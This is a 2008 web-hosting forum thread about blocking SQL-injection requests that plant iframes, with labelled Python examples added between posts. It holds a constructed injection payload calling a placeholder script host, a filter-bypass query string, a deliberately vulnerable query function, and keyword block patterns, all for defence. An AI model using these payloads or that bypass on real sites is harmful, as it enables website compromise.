-
08-26-2008, 10:30 AM #1 Junior Guru Wannabe (Join Date: Jun 2007, Posts: 72)
How to prevent an iframe injection attack?
I see a request in my log files:
GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST
Followed by some code ...
There are too many pages on the Net about injection attacks, but all I could find are at the level of news; apparently these types of attacks are increasing these days, but is there no cure?
I think the injection attack I found in the logs is a kind of Asian iframe attack which shows the user a demand to install a video CODEC or some such thing ...
My question: is it possible to prevent and block some request strings in Apache? For example, when a request arrives containing the above string?
At the end, I want to insert those attacker IPs:
58.61.134.17
222.113.196.71
123.19.164.40
70.140.147.128
82.66.91.243
123.240.44.67
60.210.103.158
193.188.105.220
---------------------
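What a request of this shape carries, decoded, as an added example that is not part of the post or its log. The 2008 mass-injection waves that produced these DECLARE/SET/CAST requests hid the real T-SQL in a hex literal inside CAST(0x... AS CHAR(4000)) or NVARCHAR(4000) and ran it with EXEC(@S); the statement appended a script or iframe tag to every text column. The request line, hex payload, table and column names and the example.invalid host below are all constructed for illustration; only the envelope matches the log line quoted in the post.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# The hex literal that carries the real statement: CAST(0x<hex> AS [N][VAR]CHAR(...)).
# Case-insensitive because the attackers mix case ("DeCLARE") to dodge naive filters.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE)
# The envelope: DECLARE @var ... followed somewhere later by CAST(0x...).
ENVELOPE_RE = re.compile(
    r"DECLARE\s+@\w+.*?CAST\s*\(\s*0x[0-9A-Fa-f]+", re.IGNORECASE | re.DOTALL)


def looks_like_mass_injection(request_line: str) -> bool:
    """True when the URL-decoded request carries the DECLARE/CAST(0x...) envelope."""
    return ENVELOPE_RE.search(unquote(request_line)) is not None


def decode_hex_payload(request_line: str) -> Optional[str]:
    """Recover the SQL hidden in the hex literal, or None if there is none."""
    m = CAST_RE.search(unquote(request_line))
    if m is None:
        return None
    raw = bytes.fromhex(m.group(1))
    # NCHAR/NVARCHAR casts hold UTF-16LE. A UTF-16LE blob cast to plain CHAR also
    # turns up, so a 0x00 high byte after an ASCII first character is treated as
    # UTF-16LE as well.
    if m.group(2).upper() == "N" or (len(raw) > 1 and raw[1] == 0):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def injected_urls(sql: str) -> List[str]:
    """The src= targets of the <script>/<iframe> tags the payload appends."""
    return re.findall(r"""src=["']?([^\s"'>]+)""", sql, re.IGNORECASE)


def analyze(request_line: str) -> dict:
    """One-shot triage of an access-log request line."""
    sql = decode_hex_payload(request_line)
    return {
        "mass_injection": looks_like_mass_injection(request_line),
        "sql": sql,
        "urls": injected_urls(sql) if sql else [],
    }


# Constructed sample (not the poster's log): the kind of UPDATE these waves ran
# against every text column, wrapped in the DECLARE/SET/CAST/EXEC envelope. The
# table and column names and the example.invalid host are placeholders.
INJECTED_SQL = ("UPDATE t SET c = c + "
                "'<script src=http://example.invalid/x.js></script>'")
SAMPLE_REQUEST = ("GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                  + INJECTED_SQL.encode("ascii").hex().upper()
                  + "%20AS%20CHAR(4000));EXEC(@S);-- HTTP/1.1")

if __name__ == "__main__":
    print(analyze(SAMPLE_REQUEST))
```

Decoding the literal from your own logs tells you which host the injected tag points at and which tables were targeted, which is more useful for cleanup than the raw request; note that the statement only does damage on a database that accepts stacked statements and has a writable text column reachable from the vulnerable query.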
-
08-26-2008, 11:01 AM #2 Web Hosting Guru (Join Date: Dec 2002, Location: USA, Posts: 339)
A nice solution is Mod Security, if you are not using it already. It will block a lot of those injection attacks with the proper filters.
-
08-26-2008, 12:08 PM #3 Junior Guru Wannabe (Join Date: Jun 2007, Posts: 72)
Thanks FrontPage1, is it possible to learn it in a few days?
Do you know of some useful resources?
-
08-26-2008, 01:21 PM #4 Eternal Learner (Join Date: Jul 2007, Posts: 2,051)
Though all the security measures can block iframe SQL injections, they are not foolproof solutions. The best way to prevent SQL injection is to make sure the coding is done keeping security in mind. I have noticed many programmers writing bad pieces of code and the applications getting attacked by SQL injection. In such a case, the programmers have to be forced to correct the code.
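The coding fix the post is asking for, as an added example (mine, not code from the thread or from any product discussed in it): the same lookup written the way that gets injected, beside the parameterized version. SQLite is used so the example runs anywhere; the schema and rows are constructed for the demonstration.

```python
import sqlite3
from typing import List, Tuple

# Constructed schema and rows for the example; nothing here is from the thread.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
INSERT INTO news VALUES (1, 'Public post', 1);
INSERT INTO news VALUES (2, 'Unpublished draft', 0);
"""


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, news_id: str) -> List[Tuple[int, str]]:
    # The bug: request input is spliced into the SQL text, so SQL syntax in the
    # input becomes part of the statement. A value of "2 OR 1=1" turns the
    # WHERE clause into (published = 1 AND id = 2) OR 1=1 and leaks every row.
    # On a server that accepts stacked statements (MS SQL Server, the target of
    # DECLARE/CAST/EXEC requests like the one in the first post), the same hole
    # runs whatever SQL follows a semicolon.
    sql = "SELECT id, title FROM news WHERE published = 1 AND id = " + news_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, news_id: str) -> List[Tuple[int, str]]:
    # The fix: the statement is compiled with a placeholder and the value is
    # bound afterwards, so the input is only ever compared as a value. The same
    # "2 OR 1=1" is now a string that matches no id.
    return conn.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?", (news_id,)
    ).fetchall()


def lookup_hardened(conn: sqlite3.Connection, news_id: str) -> List[Tuple[int, str]]:
    # Defence in depth: bind the value AND validate its type first, so garbage
    # is rejected before it reaches the database and can be logged as a probe.
    try:
        ident = int(news_id)
    except ValueError:
        raise ValueError("news id must be an integer: %r" % news_id)
    return conn.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?", (ident,)
    ).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable   :", lookup_vulnerable(db, "2 OR 1=1"))
    print("parameterized:", lookup_parameterized(db, "2 OR 1=1"))
    print("hardened     :", lookup_hardened(db, "1"))
```

The difference is where the boundary between code and data is drawn: string concatenation lets the client draw it, a bound parameter keeps it on the server side of the driver. Every mainstream driver (ADO, PDO, mysqli, JDBC, DB-API) offers placeholders, so this is a local change per query rather than a rewrite.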
-
08-27-2008, 04:35 AM #5 Web Hosting Guru (Join Date: Mar 2004, Posts: 291)
I agree with prashant1979. The gateway is the badly written code and that needs to be taken care of first.
-
08-27-2008, 10:13 AM #6 Web Hosting Master (Join Date: Dec 2001, Posts: 5,221)
Greetings:
See http://groups.google.com/group/stopb...818a35ff3d37a4 and http://groups.google.com/group/stopb...660efeada77216 in terms of our experiences with this issue.
Thank you.
-
08-27-2008, 11:27 AM #7 Web Hosting Guru (Join Date: Dec 2002, Location: USA, Posts: 339)
-
08-27-2008, 12:59 PM #8
Do NOT rely on CPanel to do your administration work for you. Installing and configuring mod_security is not something that can be 'automated' by something like CPanel. You need to take god knows how many variables into account, including what you're running on the server itself.
mod_security is NOT an all-encompassing or all-in-one solution. It's more of a pain in the tail end than a solution. A PROPER solution is to keep your server updated, patched, and worm free.
Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
08-27-2008, 01:29 PM #9 Junior Guru Wannabe (Join Date: Jun 2007, Posts: 72)
I found a book, "Apache Security", apparently written by the creator of mod_security; a little difficult for me to understand, but I'm trying, and I hope to find an easier source.
Unfortunately this is a Plesk VPS; currently Apache gives code 200 to the above GET string, and this is not a good symptom.
However, it seems none of the files are changed or infected; I had a look at all of the logs 3 times. I always upgrade and install newer versions of software, but some things are wrong: rsyslog was stopped and I observe abnormal changes in website traffic, ...
-
08-27-2008, 03:49 PM #10 Web Hosting Master (Join Date: Apr 2003, Posts: 2,407)
Forget about blocking the IPs; these attempts are distributed through dummy machines.
I added the below to my .htaccess and it stopped them dead.
Code:
# mod_rewrite is off by default in .htaccess; the rule does nothing without this
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
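How that rule behaves on real query strings, as an added example that is not part of the post: the RewriteCond is transcribed to Python and run against the query string from the first post, a benign one, one that trips it by accident, and one that walks straight past it. Apache's %{QUERY_STRING} is the raw, still-percent-encoded string, so the rule only sees the literal characters it lists; %3B (';') and %29 (')') are not in its list, yet the application decodes them. A decode-first, whole-word variant is shown beside it. The three extra query strings are constructed for this comparison.

```python
import re
from urllib.parse import unquote

# The .htaccess rule above, transcribed to Python. Apache's %{QUERY_STRING} is
# the raw, still-percent-encoded query string, so it is matched raw here too,
# case-insensitively ([NC]).
HTACCESS_RULE = re.compile(
    r"""^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*"""
    r"""(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).*""",
    re.IGNORECASE,
)


def blocked_by_htaccess_rule(query_string: str) -> bool:
    """Would the posted RewriteCond fire (and the RewriteRule return 403)?"""
    return HTACCESS_RULE.match(query_string) is not None


# A tightened variant: decode first, so encoded metacharacters (%3B for ';',
# %29 for ')') cannot slip past, and match keywords as whole words so 'reset'
# no longer triggers on 'set'. Same meta-then-keyword structure as the original.
META_RE = re.compile(r"[;<>'\")\x00\n\r]|/\*")
KEYWORD_RE = re.compile(
    r"\b(union|select|insert|cast|set|declare|drop|update|md5|benchmark)\b",
    re.IGNORECASE,
)


def blocked_normalized(query_string: str) -> bool:
    decoded = unquote(query_string)
    meta = META_RE.search(decoded)
    return meta is not None and KEYWORD_RE.search(decoded[meta.end():]) is not None


# The first query string is the one from the first post; the other three are
# constructed for this comparison.
OP_QUERY = ";DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST"
BENIGN_QUERY = "id=5"
FALSE_POSITIVE_QUERY = "msg=Don%27t%20reset%20it"      # %27, then 'set' inside 'reset'
ENCODED_BYPASS_QUERY = ("%3BDeCLARE%20@S%20CHAR%284000%29%3BSET%20@S%3DCAST"
                        "%280x41%20AS%20CHAR%284000%29%29%3BEXEC%28@S%29")

if __name__ == "__main__":
    for q in (OP_QUERY, BENIGN_QUERY, FALSE_POSITIVE_QUERY, ENCODED_BYPASS_QUERY):
        print(q)
        print("  .htaccess rule blocks:", blocked_by_htaccess_rule(q),
              " normalized blocks:", blocked_normalized(q))
```

Even the normalized check is still a keyword filter: a legitimate "a;set b" parameter gets a 403, and a payload that avoids the listed words gets through. Treat it as the band-aid the thread calls it, and test it against your own legitimate traffic before turning it on site-wide.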
-
08-27-2008, 11:33 PM #11 Junior Guru Wannabe (Join Date: Jun 2007, Posts: 72)
Many thanks for the code AHFB.
Dummy machines? Do you mean forged IPs?
-
08-28-2008, 02:15 AM #12 Aspiring Evangelist (Join Date: Oct 2005, Posts: 435)
Not forged, but bots: basically machines controlled by someone or a group.
Anyway, .htaccess is definitely the way to go to ignore the generic attacks, but getting nicely coded applications and using the most updated versions is nice. Personally, mod_security is nice in the sense that you use it to tighten security. Of course you shouldn't think of it as "I installed mod_security, I'm good now" but rather use it as a way of tightening up the server. I do that because even the latest software might have some holes in it which can be used.
-
08-28-2008, 11:58 AM #13 Web Hosting Guru (Join Date: Dec 2002, Location: USA, Posts: 339)
Sure, everyone should know how to administer their servers without fancy GUI interfaces. But that is not reality. If it was, then Cpanel would not have hundreds of thousands of users.
If most noobie end users could keep their servers patched, updated, and worm free, they really would not need cpanel. But they do. So attacking CPanel is not really logical.
And yes, Mod Security fills the needs of the overwhelming majority of servers out there. No, it is not the end-all be-all, but it is a nice, useful utility that is EASY to use.
-
08-28-2008, 12:10 PM #14 Web Hosting Master (Join Date: Nov 2004, Location: Australia, Posts: 1,737)
linux-tech makes a good point though. If you rely solely on mod_security to protect you, and you have insecure scripts on the server, one day it will bite you. As an example, if you have a hungry lion in a room with a closed door, you're safe. But if someone manages to open the door, they'll get eaten. Better to lock the door AND feed the lion well AND keep the lion in a cage. If someone opens the door by accident then, they'll be OK.
However, I've found mod_security fantastic, and wouldn't do without it. For instance, it's not fun to need to upgrade 30 Joomla 1.5 sites in a hurry because of the token password reset bug (although in that case a simple locate/cksum could be used to identify existing insecure files and replace them; that's not always an available solution though).
-
08-28-2008, 02:03 PM #15
"If it was then Cpanel would not have hundreds of thousands of users."
The primary goal and focus of CPanel is to be a Control Panel, something designed to help people do their job more easily (i.e. create email, add MySQL databases, domains, FTP accounts). It is NOT 'security' software.
Too many people recently have relied on CPanel to be their 'systems admin', when that's just not the job of CPanel. Oh sure, it's tried so hard to do it, but it CAN NOT, and WILL NOT, ever take the place of a qualified systems admin.
Administration is so much more than looking at a pretty front end in your browser. That's ALL Cpanel is, a pretty front end. It does a lot of things for you, but it can not administrate your server for you. YOU must have the skill and the talent to do that yourself.
Tom Whiting, WHMCS Guru extraordinaire
-
08-28-2008, 05:18 PM #16 WHT Addict (Join Date: Aug 2008, Location: Shoreline WA, Posts: 160)
To focus on your question, not arguing about what cPanel is or is not, or the value of an experienced server administrator, I would have to say yes to your question. There is a way to filter those requests out, but setting up any kind of filter is only a band-aid on a wound that needs to heal. I would suggest only using that as a temporary solution while you work out the actual problems in the old exploitable code. Then again, you may already know this, and you just wanted a band-aid so you can work on fixing the root of the problem. I would suggest following some of the links mentioned by "dynamicnet", or if you do not do your own programming, find an experienced admin (a programmer experienced in security matters) and have him work the code over.
-
08-28-2008, 07:25 PM #17 Junior Guru Wannabe (Join Date: Jun 2007, Posts: 72)
Fortunately I had not set up any database on that server; all of the databases are in another protected and managed DC. Also, I believe that banning IPs was effective; many hackers are just children who study some attacking methods in books or learn something at university and want to try it out, so blocking the IPs can send a warning to them and also a warning to network managers about the persons who rent their servers.
When their group tries a few times and sees everything is secure, they go on their way.
Besides this, I appreciate all of the help and kind messages.
-
08-28-2008, 07:41 PM #18 Web Hosting Guru (Join Date: Dec 2002, Location: USA, Posts: 339)
I never wrote that Cpanel was the 'ultimate systems admin tool'. You invented that part.
I stated that Cpanel serves a function for server owners who are not proficient in running server admin functions without a GUI.
You might want to let the Cpanel staff know you can't 'update' system software using their product. They probably would be surprised by that 'fact'.
If this was a perfect world, every server owner could admin and write code on their own. But the vast majority of server admins are noobs and need their hand held in running a server. Cpanel is that hand-holding for many, and many grow from that experience into learning command line functions. To trash Cpanel is just silly.
-
08-28-2008, 09:37 PM #19 Web Hosting Master (Join Date: Nov 2004, Location: Australia, Posts: 1,737)
I forgot the most important part of this, which was to say that the reason mod_security works well for me is that it works together with CSF to firewall off anyone who is testing dodgy URLs. This means that in general they only get a few chances to try SQL injection/URL inclusion/etc. before getting cut off; mostly this means they'll then move on and try a softer target (because it's an automated scanner). While mod_security by itself is OK, it only slows things down a little: the attackers just retry URLs until they find one that isn't matched and blocked in mod_security.
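The cut-off the post describes, as an added example that is not part of the post and not CSF's or mod_security's own code: probes are matched in the Apache access log, counted per source IP inside a sliding window, and a source that reaches the threshold is reported for firewalling. The log lines use documentation IP ranges and are constructed for the example; the signatures, threshold and window are my choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, Set
from urllib.parse import unquote

# Apache combined log: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Signatures of the probes discussed in this thread, matched on the decoded URL.
PROBE_RE = re.compile(
    r"declare\s+@\w+|cast\s*\(\s*0x|union\s+select|exec\s*\(", re.IGNORECASE)

THRESHOLD = 3                  # this many probes ...
WINDOW = timedelta(minutes=5)  # ... inside this period gets the source banned


def is_probe(url: str) -> bool:
    return PROBE_RE.search(unquote(url)) is not None


def probe_counts(log_lines: Iterable[str]) -> Dict[str, int]:
    """Probes seen per source IP, regardless of timing."""
    counts: Dict[str, int] = defaultdict(int)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_probe(m.group(3)):
            counts[m.group(1)] += 1
    return dict(counts)


def ban_candidates(log_lines: Iterable[str], threshold: int = THRESHOLD,
                   window: timedelta = WINDOW) -> Set[str]:
    """IPs that sent `threshold` probes inside `window` (what CSF would firewall)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    banned: Set[str] = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, stamp, url, _status = m.groups()
        if ip in banned or not is_probe(url):
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        hits = recent[ip]
        hits.append(when)
        while hits and when - hits[0] > window:   # drop hits outside the window
            hits.popleft()
        if len(hits) >= threshold:
            banned.add(ip)
    return banned


PROBE = "/?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x41%20AS%20CHAR(4000));EXEC(@S)"
# Constructed log lines (documentation IP ranges, not the addresses in the post):
# one bot hammering four probes in seconds, one single-shot probe, one real visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2008:10:13:01 +0000] "GET %s HTTP/1.1" 200 512 "-" "Mozilla/4.0"' % PROBE,
    '192.0.2.5 - - [27/Aug/2008:10:13:02 +0000] "GET /?id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Aug/2008:10:13:02 +0000] "GET /news.php?id=1%s HTTP/1.1" 200 512 "-" "Mozilla/4.0"' % PROBE[2:],
    '198.51.100.9 - - [27/Aug/2008:10:13:03 +0000] "GET /item.asp?id=7%s HTTP/1.1" 200 512 "-" "Mozilla/4.0"' % PROBE[2:],
    '203.0.113.7 - - [27/Aug/2008:10:13:04 +0000] "GET /item.asp?id=7%s HTTP/1.1" 200 512 "-" "Mozilla/4.0"' % PROBE[2:],
    '203.0.113.7 - - [27/Aug/2008:10:13:09 +0000] "GET /view.php?p=3%s HTTP/1.1" 200 512 "-" "Mozilla/4.0"' % PROBE[2:],
]

if __name__ == "__main__":
    print("probes per IP:", probe_counts(SAMPLE_LOG))
    print("ban:", ban_candidates(SAMPLE_LOG))
```

The single-shot source stays unbanned, which is the weakness the earlier reply points at: a botnet that spreads its probes across many addresses never crosses a per-IP threshold, so this mechanism buys time against noisy scanners and nothing more. The 200 in the status column is also worth a look, since a probe that gets 200 rather than 403 or 500 has at least reached the application.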
-
08-29-2008, 07:27 AM #20
This isn't a discussion about cPanel, please stick to the topic.
-
04-17-2010, 05:54 PM #21 New Member (Join Date: Apr 2010, Posts: 1)
Quick question